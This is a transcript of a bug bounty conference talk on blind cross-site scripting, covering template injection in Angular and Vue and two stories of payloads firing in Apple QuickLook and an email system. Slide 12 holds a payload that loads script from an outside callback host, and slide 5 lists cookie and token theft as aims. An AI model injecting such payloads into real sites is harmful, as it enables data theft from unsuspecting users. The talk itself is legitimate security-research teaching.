Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Getting Blindly Lucky

92465b02610a5983cde8f78dc7ddd1e4?s=47 JR0ch17
November 01, 2020

Getting Blindly Lucky

92465b02610a5983cde8f78dc7ddd1e4?s=128

JR0ch17

November 01, 2020
Tweet

Transcript

  1. Getting Blindly Lucky Interesting Blind XSS Stories

  2. {{ whoami }} Jasmin Landry JR0ch17 Part time bug bounty

    hunter
  3. {{ agenda }} • What is XSS? • & •

    Blind XSS Stories • Questions/Comments
  4. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

    of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/
  5. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

    • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter
  6. {{ }} MVC client-side framework built by Google • XSS

    • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/
  7. {{ }} “Progressive” MVVM client-side framework for building UIs and

    SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/
  8. {{ vs }} https://www.wappalyzer.com/compare/angular-vs-vue-js/

  9. {{ Blind XSS }} Variant of a Stored XSS. The

    payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator
  10. {{ XSSHunter Payloads }}

  11. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection
  12. {{ & Blind XSS Payload }} {{ constructor.constructor('import("https://jr0ch17.xss.ht")') () }}

  13. {{ Blind XSS Stories }}

  14. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file
  15. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...
  16. {{ Blind XSS Story #1 }}

  17. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...
  18. {{ Blind XSS Story #2 }} Again, I look at

    the DOM.....
  19. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!
  20. {{ Thank You}} Questions or comments @JR0ch17 https://linkedin.com/in/jasminlandry